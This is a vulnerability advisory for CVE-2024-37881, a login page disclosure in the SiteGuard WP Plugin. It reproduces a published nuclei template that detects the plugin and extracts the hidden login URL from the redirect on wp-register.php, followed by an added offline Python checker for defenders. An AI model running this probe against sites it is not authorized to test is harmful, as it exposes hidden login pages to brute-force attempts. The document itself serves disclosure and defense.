CVE-2024-37881: SiteGuard WP Plugin <= 1.7.6 - Login Page Disclosure

Date: 2025-08-01 | Affected software: SiteGuard WP Plugin | PoC: Published

Vulnerability description

The SiteGuard WP Plugin plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.7.6. This is due to the plugin not restricting redirects from wp-register.php which may disclose the login page URL. This makes it possible for unauthenticated attackers to gain access to the login page.

PoC code [published]

id: CVE-2024-37881

info:
  name: SiteGuard WP Plugin <= 1.7.6 - Login Page Disclosure
  author: s4e-io
  severity: medium
  description: |
    The SiteGuard WP Plugin plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.7.6. This is due to the plugin not restricting redirects from wp-register.php which may disclose the login page URL. This makes it possible for unauthenticated attackers to gain access to the login page.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37881
    - https://jvn.jp/en/jp/JVN60331535/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/siteguard/siteguard-wp-plugin-176-login-page-disclosure
    - https://www.usom.gov.tr/bildirim/tr-24-0726
  classification:
    epss-score: 0.03304
    epss-percentile: 0.8676
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/siteguard/"
  tags: cve,cve-2024,siteguard,wp-plugin

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/siteguard/readme.txt"

    matchers:
      - type: dsl
        internal: true
        dsl:
          - "status_code == 200"
          - 'contains(body, "SiteGuard WP Plugin")'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/wp-register.php"

    matchers:
      - type: dsl
        dsl:
          - "!contains(tolower(location), 'wp-login.php')"

    extractors:
      - type: kval
        kval:
          - location
# digest: 490a004630440220368968595c5db8284f95a98b775a15ced6643905e710ecb0bd0bb390d4ebd45c0220449aa025e5b9d31acf081c46c1352edcb81463cb263e764db9e5b32a229c1ac4:922c64590222798bb761d5b6d8e72950
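The second request in the template above only fires on the Location header of the wp-register.php response: the string check `!contains(tolower(location), 'wp-login.php')` is true whenever the redirect target is not the stock login page. The following is an added example, not part of the advisory or of the nuclei project, that reproduces that check offline over constructed HTTP responses so a defender can see exactly which responses are flagged. It also separates out the case the string check alone does not distinguish: a response with no Location header at all (for example a 404), which a plain "does not contain wp-login.php" test would otherwise lump together with a genuine disclosure. All response bytes below are constructed samples, and `classify` is a hypothetical helper name.

```python
"""Offline evaluation of the Location-header check used by the CVE-2024-37881 template.

Added example (not the advisory's or nuclei's own code). Parses a raw HTTP
response, extracts the Location header and applies the same string test the
template's second matcher uses, while treating "no redirect at all" as its own
outcome instead of a match.
"""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple


@dataclass
class Verdict:
    status_code: int
    location: Optional[str]     # raw Location header, None if absent
    string_check: bool          # result of: not ("wp-login.php" in location.lower())
    outcome: str                # "disclosure", "expected-redirect" or "no-redirect"


def parse_response(raw: bytes) -> Tuple[int, Dict[str, str]]:
    """Split a raw HTTP/1.x response into (status_code, lower-cased header map)."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    # Status line looks like "HTTP/1.1 302 Found"
    status_code = int(lines[0].split(" ")[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status_code, headers


def classify(raw: bytes) -> Verdict:
    """Apply the template's matcher logic to one wp-register.php response.

    The template checks !contains(tolower(location), 'wp-login.php'). Here an
    absent header is evaluated against the empty string (an assumption about
    how to model the DSL; the page does not say how nuclei treats a missing
    header), but it is reported as a separate outcome so that a 404 or a plain
    200 page is never counted as a login-page disclosure.
    """
    status_code, headers = parse_response(raw)
    location = headers.get("location")
    string_check = "wp-login.php" not in (location or "").lower()

    if location is None:
        outcome = "no-redirect"
    elif string_check:
        # Redirect exists and does not point at the stock login page:
        # this is the condition the advisory describes as disclosing the URL.
        outcome = "disclosure"
    else:
        outcome = "expected-redirect"
    return Verdict(status_code, location, string_check, outcome)


# Constructed sample responses (not captured from any real site).
LEAKING = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: https://example.test/?custom_login_slug_12345\r\n"
    b"Content-Length: 0\r\n\r\n"
)
NORMAL = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: https://example.test/wp-login.php?action=register\r\n"
    b"Content-Length: 0\r\n\r\n"
)
NOT_FOUND = (
    b"HTTP/1.1 404 Not Found\r\n"
    b"Content-Type: text/html\r\n\r\n"
    b"<html><body>Not Found</body></html>"
)

if __name__ == "__main__":
    for name, raw in (("leaking", LEAKING), ("normal", NORMAL), ("404", NOT_FOUND)):
        print(name, classify(raw))
```

The `outcome` field is the value a defender should act on when re-checking a patched site: only "disclosure" means wp-register.php still forwards visitors to the hidden login URL, while "no-redirect" shows a response the template's string check would accept but that reveals nothing.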